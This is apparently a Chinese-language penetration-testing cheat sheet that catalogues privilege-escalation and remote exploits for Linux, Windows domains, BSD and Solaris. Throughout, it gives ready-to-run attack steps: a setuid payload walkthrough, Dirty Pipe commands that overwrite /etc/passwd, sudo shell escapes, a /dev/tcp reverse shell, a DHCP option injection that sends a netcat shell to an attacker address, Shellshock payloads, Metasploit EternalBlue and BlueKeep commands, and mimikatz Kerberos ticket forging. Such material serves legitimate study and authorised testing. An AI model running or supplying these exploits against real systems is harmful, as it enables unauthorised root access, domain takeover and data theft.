Exploits

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

大纲

Linux
- 系统漏洞提权
- 原生软件提权
- 系统配置提权
  - sudo
  - suid
- 远程漏洞
Windows
- 系统漏洞提权
- 远程漏洞
- 域
- 其他
FreeBSD
OpenBSD
Solaris

Linux

相关资源

- 非常好用,可以直接下载 linpeas.sh 运行

相关文章

内核漏洞提权

文章教程

提权辅助工具

- 辅助信息收集脚本
- 在没有 root 权限的情况下监视 linux 进程
- 一个用来识别和利用 sudo 规则的错误配置和漏洞的工具
- Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, pwnkit, dirty pipe, +w docker.sock

以下工具长期未更新,不推荐

- 长期未更新，不推荐
- 长期未更新，不推荐
- 长期未更新，不推荐
- 长期未更新，不推荐

CVE-2009-2698

简介
在 2.6.19 之前 Linux 内核中的(1) net/ipv4/udp.c 和(2) net/ipv6/udp.c 中的 udp 实现中的 udp_sendmsg 函数允许本地用户通过涉及 MSG_MORE 标志和 UDP 套接字的向量获得特权或导致拒绝服务(空指针取消引用和系统崩溃)。
影响范围
- Linux kernel < 2.6.19
- CentOS 4.4/4.5
- Fedora Core 4/5/6 x86
POC | Payload | exp

CVE-2010-3847

POC | Payload | exp

# 在/tmp下创建可控制的目录
$ mkdir /tmp/exploit
# 链接到suid二进制程序以更改$ORIGIN的定义

$ ln /bin/ping /tmp/exploit/target
# 打开到目标二进制程序的文件描述符

$ exec 3< /tmp/exploit/target
# 现在可通过/proc访问描述符

$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
# 删除之前所创建的目录

$ rm -rf /tmp/exploit/
# /proc链接仍存在，但已标记为已被删除

$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
# 使用负载DSO替换目录，使$ORIGIN成为到dlopen()的有效目标

$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
# 通过LD_AUDIT强制/proc中的链接加载$ORIGIN

$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)

CVE-2016-4557

简介
Linuxkernel 是美国 Linux 基金会发布的开源操作系统 Linux 所使用的内核。NFSv4implementation 是其中的一个分布式文件系统协议。Linuxkernel4.5.5 之前版本的 kernel/bpf/verifier.c 文件中的‘replace_map_fd_with_map_ptr’函数存在安全漏洞，该漏洞源于程序没有正确维持 fd 数据结构体。本地攻击者可借助引用不正确文件描述符的 BPF 指令利用该漏洞获取权限或造成拒绝服务（释放后重用）。
影响范围
- Linux kernel <= 4.5.4
POC | Payload | exp
- https://www.exploit-db.com/exploits/39772
- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

CVE-2016-5195 脏牛 Dirty COW

简介
2016年10月18日，Phil Oester 提交了隐藏长达9年之久的“脏牛漏洞（Dirty COW）”0day 漏洞，该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞，导致可以破坏私有只读内存映射。黑客可以获取低权限的本地用户后，利用此漏洞获取其他只读内存映射的写权限，进一步获取 root 权限。
影响范围
- Linux kernel < 4.8.3
相关文章
POC | Payload | exp
- https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
- https://www.exploit-db.com/exploits/40616
- https://www.exploit-db.com/exploits/40847

CVE-2017-1000253

简介
在 Linux 环境下，如果应用程序编译时有 -pie 编译选项，则 load_elf_binary() 将会为其分配一段内存空间，但是 load_elf_ binary() 并不考虑为整个应用程序分配足够的空间，导致 PT_LOAD 段超过了 mm->mmap_base。在 x86_64 下，如果越界超过 128MB，则会覆盖到程序的栈，进而可能导致权限提升。
影响范围
- centos < 7.1708
- redhat < 7.4
POC | Payload | exp
- https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

CVE-20171000405 Huge Dirty COW

简介
安全团队 Bindecy 爆出名为大脏牛（HugeDirty Cow）的内核提权漏洞，编号为 CVE-20171000405。包含 linux 内核（2.6.38~4.14）的服务器，桌面，移动等众多设备将面临严重挑战，数以百万计的用户受到安全威胁。该漏洞是由于对之前的内核提权漏洞（cve-2016-5195）修补不完整引发
影响范围
- 2.6.38 <= Linux kernel <= 4.14
相关文章
POC | Payload | exp

CVE-2019-13272 Linux 4.10 < 5.1.17 PTRACE_TRACEME local root

简介
在 5.1.17 之前的 Linux 内核中，kernel/ptrace.c 中的 ptrace_link 在记录想要创建 ptrace 关系的进程的凭证时处理不当，这使得本地用户可以通过利用某些具有父子进程关系的场景获得 root 权限，其中父进程放弃权限并调用 execve（可能允许攻击者控制）。一个促成因素是对象寿命问题。另一个因素是不正确地将 ptrace 关系标记为特权，这可以通过（例如）PTRACE_TRACEME 的 Polkexec 帮助程序来利用。注意：在某些环境中，SELinux deny_ptrace 可能是一个可用的变通方法。
相关文章
POC | Payload | exp
- https://github.com/firebroo/sec_tools/tree/master/linux-kernel-exploits/CVE-2019-13272

CVE-2020-8835 Linux Kernel 信息泄漏/权限提升

简介
漏洞是因为 bpf 验证程序没有正确计算一些特定操作的寄存器范围，导致寄存器边界计算不正确，进而引发越界读取和写入。该漏洞在 Linux Kernelcommit(581738a681b6) 中引入。
相关文章
POC | Payload | exp

CVE-2020-14386

相关文章
POC | Payload | exp

CVE-2021-3490

简介
该漏洞源于按位操作（AND，OR 和 XOR）的 eBPF ALU32 边界跟踪不会更新 32 位边界，攻击者可利用该漏洞触发越界读写，从而从普通权限提升到 root 权限。
POC | Payload | exp

CVE-2021-3493

相关文章
POC | Payload | exp

CVE-2021-22555

相关文章
POC | Payload | exp

CVE-2022-0185

相关文章
POC | Payload | exp

CVE-2021-31440 Linux 内核eBPF提权漏洞

CVE-2021-33909

POC | Payload | exp

CVE-2022-0847

影响范围
- 5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102

gcc poc.c -o exp -std=c99

cp /etc/passwd /tmp/passwd_bak
new_passwd=$(cat /etc/passwd|head)
./exp /etc/passwd 1 "${new_passwd/root:x/oot:}"

su root

POC | Payload | exp

https://haxx.in/files/dirtypipez.c

mkdir dirtypipez
cd dirtypipez
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o dirtypipez

find / -perm -u=s -type f 2>/dev/null
./dirtypipez /bin/su

- Dirty Pipe root exploit for Android (Pixel 6)

CVE-2022-2588

POC | Payload | exp

CVE-2022-2639 Linux 内核 openvswitch 本地提权

POC | Payload | exp

CVE-2022-25636

相关文章
POC | Payload | exp

CVE-2022-27666

描述
CVE-2022-27666 是 Linux esp6 加密模块中的一个漏洞。该漏洞成因是，esp6模块中用户消息的接收缓冲区是8页缓冲区，但发送者可以发送大于8页的消息，造成缓冲区溢出。
相关文章
POC | Payload | exp

CVE-2022-34918

POC | Payload | exp

原生软件提权

CVE-2019-7304

CVE-2019-14287

简介
当 sudo 配置为允许用户以任意方式运行命令时用户通过 Runas 规范中的 ALL 关键字，可以通过指定用户 ID -1 或 4294967295 以 root 用户身份运行命令。
影响范围
- Sudo_project:Sudo:1.3.0:::*
- Sudo_project:Sudo:1.3.1:::*
- Sudo_project:Sudo:1.4.0:::*
- Sudo_project:Sudo:1.5.0:::*
- Sudo_project:Sudo:1.5.1:::*
相关文章

POC | Payload | exp

cat /etc/sudoers | grep "(\s*ALL\s*,\s*\!root\s*)"
cat /etc/sudoers | grep "(\s*ALL\s*,\s*\!#0\s*)"

sudo -u#-1 id -u
或者:
sudo -u#4294967295 id -u

Ubuntu + accountsservice dos + gdm3 LPE

CVE-2021-3156 Sudo 本地权限提升

漏洞描述
在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户（普通用户和系统用户，sudoer和非sudoers）都可以利用此漏洞，而无需进行身份验证，攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。
相关文章

POC | Payload | exp

以非root用户登录系统,运行
sudoedit -s /

如果响应一个以sudoedit:开头的报错，那么表明存在漏洞。

https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz

CVE-2021-3560

CVE-2021-4034 pkexec 本地权限提升

相关文章
- https://www.t00ls.com/articles-67498.html
POC | Payload | exp
- - PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)
- - CVE-2021-4034 1day
- - Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation
- - polkit pkexec Local Privilege Vulnerability to Add custom commands
- - CVE-2021-4034简单优化，以应对没有安装gcc和make的目标环境

系统配置提权

文章教程

若 /etc/passwd 文件可修改

梦想总得有,万一真的可以成功呢

openssl passwd -1   # 输入你想改成的密码,用得到的 hash 去替换 root 行的 x
python -c 'import pty; pty.spawn("/bin/bash")'

然后 su root,输入上一步改的密码

符号链接攻击

相关文章

sudo

sudo -l # 查看当前用户执行哪些 sudo 命令无需密码

下面只记录部分,更多内容访问

zip

sudo zip /tmp/tmp.zip /tmp/ -T --unzip-command="sh -c /bin/bash"

-T 表示测试 test.zip 的完整性
-unzip-command 与 -T 一起使用，可以指定自定义命令用于解压 test.zip

tar

sudo tar cf /dev/null test --checkpoint=1 --checkpoint-action=exec=/bin/bash

-checkpoint-action 选项是提权点,可以自定义需要执行的动作

strace
```
sudo strace -o /dev/null /bin/bash
```
nmap
低版本的 nmap3.x 有 interactive 模式，且设置了 suid，这个时候可以进入交互模式执行 !sh 命令即可轻松完成提权。
```
echo "os.execute('/bin/bash')" > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
```
more
```
sudo more /etc/hosts
!/bin/bash
```
git
```
sudo git help status
!/bin/bash
```
ftp
```
sudo ftp
ftp> !/bin/bash
```
vim
```
sudo vim -c '!bash'
```
perl:
```
sudo perl -e 'exec "/bin/bash";'
```

python:

sudo python -c 'import pty;pty.spawn("/bin/bash")'

less
```
sudo less /etc/hosts
v
:shell
```
awk
```
sudo awk 'BEGIN {system("/bin/bash")}'
```
man
```
sudo man man
!/bin/bash
```

sudo vi

:!bash
或
:!/bin/sh
或
:set shell=/bin/sh
:shell

find
```
find . -exec /bin/sh \;
```

suid

找带 suid 的文件

并不是说程序存在 suid 位就可以提权,还需要看程序的所有者

find / -perm -u=s 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

筛选出其中所有人有 rwx 权限的文件,添加如下一句话:

bash -i >& /dev/tcp/<kali-ip>/port 0>&1

远程漏洞

CVE-2014-6271 Bash 远程代码执行漏洞"破壳"

简介
GNU Bash 是美国软件开发者布莱恩-福克斯（Brian J. Fox）为 GNU 计划而编写的一个 Shell（命令语言解释器），它运行于类 Unix 操作系统中（Linux 系统的默认 Shell），并能够从标准输入设备或文件中读取、执行命令，同时也结合了一部分 ksh 和 csh 的特点。
GNU Bash 4.3 及之前版本中存在安全漏洞，该漏洞源于程序没有正确处理环境变量值内的函数定义。远程攻击者可借助特制的环境变量利用该漏洞执行任意代码。以下产品和模块可能会被利用：OpenSSH sshd 中的 ForceCommand 功能，Apache HTTP Server 中的 mod_cgi 和 mod_cgid 模块，DHCP客户端等。（说明：该漏洞的补丁并没有完全修复该问题，CNNVD-201409-956 补充了不完整修复后仍存在的问题）
相关文章
POC | Payload | exp
本地验证方法
env x='() { :;}; echo Vulnerable CVE-2014-6271 ' bash -c "echo test"
执行命令后,如果显示 Vulnerable CVE-2014-6271,证系统存在漏洞,可改变 echo Vulnerable CVE-2014-6271 为任意命令进行执行.
User-Agent: () { :;}; whoami

MSF 模块

use exploit/linux/http/ipfire_bashbug_exec
use exploit/multi/http/cups_bash_env_exec
use exploit/unix/dhcp/bash_environment

CVE-2015-7547

简介
Google 安全团队发现 glibc 存在的溢出漏洞。glibc 的 DNS 客户端解析器中存在基于栈的缓冲区溢出漏洞。当软件用到 getaddrinfo 库函数（处理名字到地址以及服务到端口的转换）时，攻击者便可借助特制的域名、DNS 服务器或中间人攻击利用该漏洞，控制软件，并试图控制整个系统。
攻击者使用恶意的 DNS 域名服务器创建类似于 evildomain.com 的域名，然后向目标用户发送带有指向该域名的链接的邮件，一旦用户点击该链接，客户端或浏览器将会开始查找 evildomain.com，并最终得到恶意服务器的 buffer-busting 响应。该域名被嵌入服务器日志中，一旦解析就会触发远程代码执行，SSH 客户端也会因此被控制。或者，位于目标用户网络中的中间人攻击者可以篡改 DNS 响应，向恶意代码中动态注入负载。
简单的说，只要控制了 linux 服务器所访问的 DNS 服务器，或者对 linux 服务器的流量进行劫持；那么，在 Linux 服务器做 DNS 请求时，恶意 DNS 服务器就可以对 linux 服务器进行远程溢出攻击，获取服务器权限。
相关文章
POC | Payload | exp

CVE-2018-1111 DHCP 客户端脚本代码执行漏洞

简介
Fedora 是由 Fedora 项目社区开发、美国红帽（Red Hat）公司赞助的一套基于 Linux 的操作系统。DHCP packages 是其中的一个动态主机配置协议软件包。
Fedora 28 及之前版本、Red Hat Enterprise Linux 6 和 7 中的 DHCP 包的 NetworkManager integration 脚本存在命令注入漏洞。本地攻击者可通过伪造 DHCP 响应利用该漏洞在系统以 root 权限执行任意命令。
相关文章
POC | Payload | exp

本地利用方法

attacker: kali linux 2018 x64 192.168.71.5
victim: Centos 7 x64 192.168.71.10

vim dnsmasq.conf
bind-interfaces
interface=eth0
except-interface=lo
dhcp-range=192.168.71.10,192.168.71.20,12h
dhcp-option=3,192.168.71.5
dhcp-option=6,192.168.71.5
log-queries
log-facility=/var/log/dnsmasq.log

dnsmasq -dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash192.168.71.5 6666 #"
nc -l -p 6666 -v

重启 CentOS 的网络服务,然后 shell 就反弹回来了

Windows

相关资源

- Windows Exploits

提权漏洞

相关文章

提权辅助工具

- 此工具将目标修补程序级别与 Microsoft 漏洞数据库进行比较,以便检测目标上可能缺少的修补程序.
- Windows Exploit Suggester
- 爬取微软漏洞信息,MS 对应的每个版本操作系统 KB 号以及补丁下载地址.
- Windows 平台提权漏洞集合
- 将目标的修补程序与微软的漏洞数据库进行比较，以检测目标的潜在缺失修补程序。
- 一个简单的工具，可以用来识别影响 Windows 操作系统的漏洞。
- Privilege Escalation Enumeration Script for Windows

添加开机启动项

useradd.c

#include <stdlib.h>
int main ()
{
    int i;
    i=system ("net localgroup adminstrators lowpriv /add");
    return 0;
}

i586-mingw32msvc-gcc useradd.c -o useradd.exe

将 useradd.exe 传到目标机上,用 useradd.exe 去替换 everyone 完成控制且以系统权限开机自启的 exe,即可将用户 lowpriv 提升为管理员权限

查看一个程序的各个用户权限: icacls xxx.exe

CVE-2016-3225 && MS16-075

简介
Windows SMB 服务器特权提升漏洞（CVE漏洞编号：CVE-2016-3225）当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时，Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞，成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。若要利用此漏洞，攻击者首先必须登录系统。然后，攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序，从而控制受影响的系统。
POC | Payload | exp

CVE-2016-7255 && MS16-135

相关文章
POC | Payload | exp
- https://github.com/tinysec/public/tree/master/CVE-2016-7255
- https://github.com/Al1ex/WindowsElevation/tree/master/CVE-2016-7214

CVE-2017-0050 && MS17-017

POC | Payload | exp
- https://github.com/Al1ex/WindowsElevation/tree/master/CVE-2017-0050

schedsvc!SchRpcSetSecurity() 漏洞

相关文章
POC | Payload | exp

CVE-2018-8120

简介
Microsoft Windows 中存在提权漏洞，该漏洞源于 Win32k 组件没有正确的处理内存中的对象。攻击者可利用该漏洞在内核模式下以提升的权限执行任意代码。
影响版本
- Microsoft Windows 7 SP1
- Windows Server 2008 SP2
- Windows Server 2008 R2 SP1
相关文章
POC | Payload | exp

CVE-2019-0803

相关文章
POC | Payload | exp
- https://github.com/Al1ex/WindowsElevation/tree/master/CVE-2019-0803

CVE-2019-1132

相关文章
POC | Payload | exp

CVE-2019-1215

简介
Microsoft Windows 和 Microsoft Windows Server 都是美国微软（Microsoft）公司的产品。Microsoft Windows 是一套个人设备使用的操作系统。Microsoft Windows Server 是一套服务器操作系统。
Microsoft Windows 和 Microsoft Windows Server 中 ws2ifsl.sys(Winsock) 处理内存对象的方式存在提权漏洞。攻击者可借助特制的应用程序利用该漏洞以提升的权限执行代码。
影响版本
- Windows_10
- Windows 7 SP1
- Windows 8.1
- Windows RT 8.1
- Windows Server 2008 SP2
- Windows Server 2008 R2 SP1
- Windows Server 2012
- Windows Server 2012 R2
- Windows Server 2016
- Windows Server 2019
相关文章
POC | Payload | exp

CVE-2019-1388

简介
Microsoft Windows 和 Microsoft Windows Server 都是美国微软（Microsoft）公司的产品。Microsoft Windows 是一套个人设备使用的操作系统。Microsoft Windows Server 是一套服务器操作系统。Windows Certificate Dialog 是其中的一个证书操作对话框组件。
Microsoft Windows Certificate Dialog 中存在提权漏洞，该漏洞源于程序没有正确执行用户特权。攻击者可通过登录系统并借助特制的应用程序利用该漏洞获取提升的权限。
影响版本
- Windows_10
- Windows 7 SP1
- Windows 8.1
- Windows RT 8.1
- Windows Server 2008 SP2
- Windows Server 2008 R2 SP1
- Windows Server 2012
- Windows Server 2012 R2
- Windows Server 2016
- Windows Server 2019
相关文章
POC | Payload | exp
- - guest→system（UAC手动提权）

CVE-2020-0668

POC | Payload | exp

CVE-2020-0683

POC | Payload | exp

CVE-2020-0787

相关文章
POC | Payload | exp
- https://github.com/Al1ex/WindowsElevation/tree/master/CVE-2020-0787

CVE-2020-0796

POC | Payload | exp
- - Windows SMBv3 LPE Exploit

WerTrigger

POC | Payload | exp

CVE-2020-1054

相关文章
POC | Payload | exp

CVE-2020-1066

POC | Payload | exp

CVE-2020-1170 Microsoft Windows Defender 提权漏洞

CVE-2021-1727

POC | Payload | exp

CVE-2021-1732

相关文章
POC | Payload | exp

CVE-2021-33739

CVE-2021-34484

相关文章
POC | Payload | exp

CVE-2021-36934

相关文章
POC | Payload | exp

CVE-2021-40449

相关文章
POC | Payload | exp
- https://github.com/Al1ex/WindowsElevation/tree/master/CVE-2021-40449

CVE-2021-41379 && CVE-2021-43883

简述
Windows Installer 存在权限提升漏洞，该漏洞利用程序通过覆盖 Microsoft Edge 提升服务（elevation_service.exe）DACL，将自身复制到 elevation_service.exe 并执行它以获得提升的权限。本地攻击者可以利用此漏洞获取 SYSTEM 权限。
POC | Payload | exp
- - Windows MSI Installer LPE (CVE-2021-43883)

CVE-2022-21882

POC | Payload | exp
- - win32k LPE

远程漏洞

MS08-067 & CVE-2008-4250

MSF 模块

use exploit/windows/smb/ms08_067_netapi
set payload windows/x64/meterpreter/reverse_tcp
set target 0

MS12-020 & CVE-2012-0002

MSF 模块

use auxiliary/scanner/rdp/ms12_020_check
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

MS14-066 & CVE-2014-6321

POC | Payload | exp

MS15-034 & CVE-2015-1635

POC | Payload | exp
相关文章

MSF 模块

use auxiliary/scanner/http/ms15_034_http_sys_memory_dump    # 读取服务器内存数据
use auxiliary/dos/http/ms15_034_ulonglongadd    # 进行 dos 攻击

CVE-2017-0143 - CVE-2017-0148 && MS17-010

MSF 模块

# 发现,检测
use auxiliary/scanner/smb/smb_ms17_010
set rhosts [ip]
run

# 命令执行,不回弹
use auxiliary/admin/smb/ms17_010_command
set command whoami

# 使用 payload 连上去
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set lhost [ip]      # 设置回弹地址
set rhosts [ip]
run

# msf 下加载 mimikatz 模块
load mimikatz
kerberos

修复工具

bluekeep & CVE-2019-0708

相关文章
POC | Payload | exp
- (实测、蓝屏)
- - 批量检测工具
- - Windows版单文件exe版
修复工具
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

MSF 模块

# 发现,检测
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts [ip]
run

# 利用
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set target [1-7]
set rhosts [ip]
show options
exploit
shell
python

SMBGhost && CVE-2020-0796 微软 SMBv3 协议远程代码执行漏洞

简介
2020年3月11日，思科 Talos 发布了一个威胁等级被标记为 Critical 的 SMB 服务远程代码执行漏洞（CVE-2020-0796）综述，攻击者可以利用此漏洞远程无需用户验证通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码，从而获取机器的完全控制。
本次漏洞存在于微软 SMBv3.0 协议中，该漏洞是由 SMBv3 处理恶意压缩数据包时进入错误流程造成的。攻击者利用该漏洞无须权限即可实现远程代码执行，受黑客攻击的目标系统只需开机在线即可能被入侵。
相关文章
POC | Payload | exp
- - 远程利用代码
- - 蓝屏 POC
- - 本地提权 POC
修复工具
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796

CVE-2020-1350

相关文章
POC | Payload | exp

CVE-2020-16898

CVE-2021-31166

相关文章
POC | Payload | exp
- - Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.

CVE-2022-21907

POC | Payload | exp

域

Windows Access Token 令牌假冒

当用户注销后，系统将会使主令牌切换为模拟令牌，不会将令牌清除，只有在重启机器后才会清除。

可以使用多种工具查看目前系统上存在的模拟令牌:

Incognito
Powershell - Invoke-TokenManipulation.ps1
Cobalt Strike - steal_token

MSF Moudle

getsystem
load incognito meterpreter > list_tokens -u
impersonate_token "PAYLOADS\\Administrator”

MS14-025

MS14-068 & CVE-2014-6324

简介
ms14-068 漏洞是 KDC 服务中的 Windows 漏洞，是由 PAC 认证错误引起，导致域内普通用户可以在 Kerberos TGT 中加入伪造的凭据，从域用户提升到域管理员权限。在执行 ms14-068 漏洞之前，需要通过 systeminfo 看目标机器是否打补丁 kb3011780，如果没打就可以尝试使用该方法进行域提权。
影响版本
- Windows 7 SP1
- Windows 8.1
- Windows RT 8.1
- windows vista
- Windows Server 2003 SP2
- Windows Server 2008 SP2
- Windows Server 2008 R2 SP1
- Windows Server 2012
- Windows Server 2012 R2
相关文章

POC | Payload | exp

登录普通域用户 whoami/user 获取 sid

退出域用户，登录本地用户

MS14-068.exe -u test@test.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.1.1 -p Admin123

# -u 域账号+@+域名称
# -s 为 ts1 的 SID 值，可以通过 whoami/all 来获取用户的 SID 值
# -d 为当前域的域控
# -p 为当前用户的密码，即 ts1 的密码

接下来将导出生成一张 kerberos 票据，配合 mimikatz 的 ptt 功能，将票据导入到内存中

使用 mimikatz 将票据注入到当前内存中，伪造凭证，如果成功则拥有域管理权限，可任意访问域中所有机器

kerberos::purge                 # 清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造
kerberos::list                  # 查看当前机器凭证
kerberos::ptc [ccachefile]      # 将票据注入到内存中

可以使用 net use \\域控名\C$ 尝试访问域控

也能执行 psexec
PsExec64.exe -accepteula \\域控名 -s cmd /c "whoami /all"

CVE-2019-1040 Windows NTLM 篡改漏洞

简介
使用中继的 LDAP 身份验证，为攻击者帐户授予 DCSync 权限。攻击者帐户使用 DCSync 转储 AD 中的所有密码哈希值。
也可以将目标服务器的基于资源的约束委派权限授予攻击者控制下的计算机帐户。攻击者作为受害者服务器上的任何用户进行身份验证。
相关文章
POC | Payload | exp

CVE-2020-1472 zerologon

相关文章
影响版本
- Windows Server 2008
- Windows Server 2012
- Windows Server 2016
- Windows Server 2019
POC | Payload | exp
- - 漏洞检测
- - 漏洞利用\环境恢复
- mimikatz

CVE-2021-1675 && CVE-2021-34527

描述
利用该漏洞，攻击者可以使用一个低权限用户（包括匿名共享 guest 账户），对本地网络中的电脑发起攻击，控制存在漏洞的电脑。尤其在企业内部，在域环境中，普通域用户，可以通过该服务，攻击域控服务器，从而控制整个网络。
相关文章
POC | Payload | exp
- - 启匿名 smb
- - cs插件

NoPac && CVE-2021-42287 && CVE-2021-42278

POC | Payload | exp

# 扫描探测
.\noPac.exe scan -domain test.local -user test -pass 'Abcd1234!@'

# 直接利用
.\noPac.exe -domain test.local -user test -pass 'Abcd1234!@' /dc dc.test.local /mAccount test123 /mPassword passW0rd /service cifs /ptt

其他

CVE-2018-8420 Msxml 解析器的远程代码执行漏洞

POC | Payload | exp

CVE-2020-0601

POC | Payload | exp

物理接触

CVE-2020-1398

相关文章
- - 通过粘贴键+讲述人 bypass windows bitlocker锁屏

DOS

condrv.sys内存损坏漏洞

CVE-2020-16899

CVE-2021-24086

POC | Payload | exp

FreeBSD

CVE-2013-2171

POC | Payload | exp

OpenBSD

CVE-2019-19726 OpenBSD 提权

简介
OpenBSD 是加拿大 OpenBSD 项目组的一套跨平台的、基于 BSD 的类 UNIX 操作系统。
OpenBSD 6.6 及之前版本中存在安全漏洞。本地攻击者可利用该漏洞将权限提升至 root，进而以该权限执行自己的库代码。
影响版本
- Openbsd:Openbsd:-:::*
- Openbsd:Openbsd:2.0:::*
- Openbsd:Openbsd:2.1:::*
- Openbsd:Openbsd:2.2:::*
- Openbsd:Openbsd:2.3:::*
POC | Payload | exp

Solaris

CVE-2020-14724

POC | Payload | exp
- http://www.vapidlabs.com/advisory.php?v=212
- https://github.com/lcashdol/Exploits/tree/master/ddu-exploit

CVE-2020-14871

简介
2018 年底，FireEye 子公司 Mandiant 的 FLARE AdvancedPractices 团队，在追踪 UNC1945 团体的活动时发现该团体在一台 Oracle Solaris 操作系统上安装了一个被称为 SLAPSTICK 的后门，用以捕获连接详细信息和身份凭证。转眼间到了 2020 年中旬，Mandiant 观察到 UNC1945 团体在 Oracle Solaris9 服务器上部署了称为 EVILSUN 的远程利用工具。[2] 通过分析发现该工具利用 Oracle Solaris Pluggable Authentication Module (可插拔身份验证模块，简称 PAM) 的基于堆栈的缓冲区溢出漏洞获取最高系统权限。FLARE 小组的进攻性特遣队（OffensiveTask Force）分析了此漏洞以确定其工作方式，并在不同版本的 Solaris 系统上重现了漏洞，然后将其报告给 Oracle。
相关文章
MSF 模块
```
solaris/ssh/pam_username_bof
```

PreviousLinux 安全 NextNTLM中继